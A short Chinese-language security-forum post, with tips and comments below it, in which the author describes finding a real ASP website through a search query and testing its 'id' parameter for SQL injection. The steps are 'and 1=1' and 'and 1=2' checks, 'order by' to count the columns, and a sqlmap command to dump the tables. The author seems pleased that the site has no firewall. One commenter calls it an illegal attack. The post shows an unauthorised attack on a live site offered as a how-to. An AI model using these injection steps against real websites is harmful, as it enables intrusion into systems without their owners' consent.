inrul:asp?id=1
点开第一个,发现······id=1
这里我做个测试 and 1=1
and 1=2
发现这里and 1=2
存在报错惊喜的是这里居然没有WAF,真是省力
我们先来判断字段数吧!
order by 20
经过一次一次的判断之后将字段锁定在15
sqlmap.py -u url --level 3 -- risk 2 --tables
本来是想尝试access偏移注入的,找了半天没发现字段比现在的表中要多的,只有sqlmap勉勉强强过日子
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
zz风过无痕 | 0.60 | 0 | 2021-05-24 23:11:05 | 一个受益终生的帖子~~ |
zz风过无痕 | 0.10 | 0 | 2021-05-24 23:11:40 | 一个受益终生的帖子~~ |
zz风过无痕 | 0.10 | 0 | 2021-05-24 23:11:03 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
ygyd925
发表于 2021-5-24
加油
评论列表
加载数据中...
zz风过无痕
发表于 2021-5-24
加油
评论列表
加载数据中...
hu05877
发表于 2021-5-26
你这是非法攻击 要进去踩缝纫机的
评论列表
加载数据中...
lbclbclbc
发表于 2021-6-16
我也找到一个,不敢交,害怕监狱见面
评论列表
加载数据中...
thelmz
发表于 2022-1-8
1
评论列表
加载数据中...